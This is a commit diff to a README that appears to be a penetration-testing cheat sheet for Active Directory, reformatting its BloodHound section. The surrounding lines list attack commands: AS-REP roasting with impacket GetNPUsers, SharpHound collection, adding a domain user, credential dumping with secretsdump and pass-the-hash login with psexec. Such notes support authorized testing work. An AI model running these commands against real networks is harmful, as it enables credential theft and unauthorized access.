Update README.md
This commit is contained in:
13
README.md
13
README.md
@@ -664,13 +664,9 @@ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN1
|
||||
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN1}.{DOMAIN2}/ -dc-ip {IP ADDRESS} -userfile {USER.txt} -format hashcat
|
||||
|
||||
# Bloodhound
|
||||
sudo ./usr/bin/neo4j console
|
||||
|
||||
RHOST
|
||||
./sharphound.exe -c all
|
||||
|
||||
LHOST
|
||||
./BloodHound --no-sandbox
|
||||
sudo ./usr/bin/neo4j console # LHOST
|
||||
./sharphound.exe -c all # RHOST
|
||||
./BloodHound --no-sandbox # LHOST
|
||||
|
||||
# Add user
|
||||
net user {USERNAME} {PASSWORD} /add /domain
|
||||
@@ -689,9 +685,6 @@ sudo python3 ./usr/share/doc/python3-impacket/examples/secretsdump.py '{DOMAIN}/
|
||||
# PSEXEC
|
||||
sudo python3 psexec.py -hashes {HASH1:HASH2} {USERNAME}@{IP ADDRESS}
|
||||
|
||||
|
||||
|
||||
|
||||
```
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user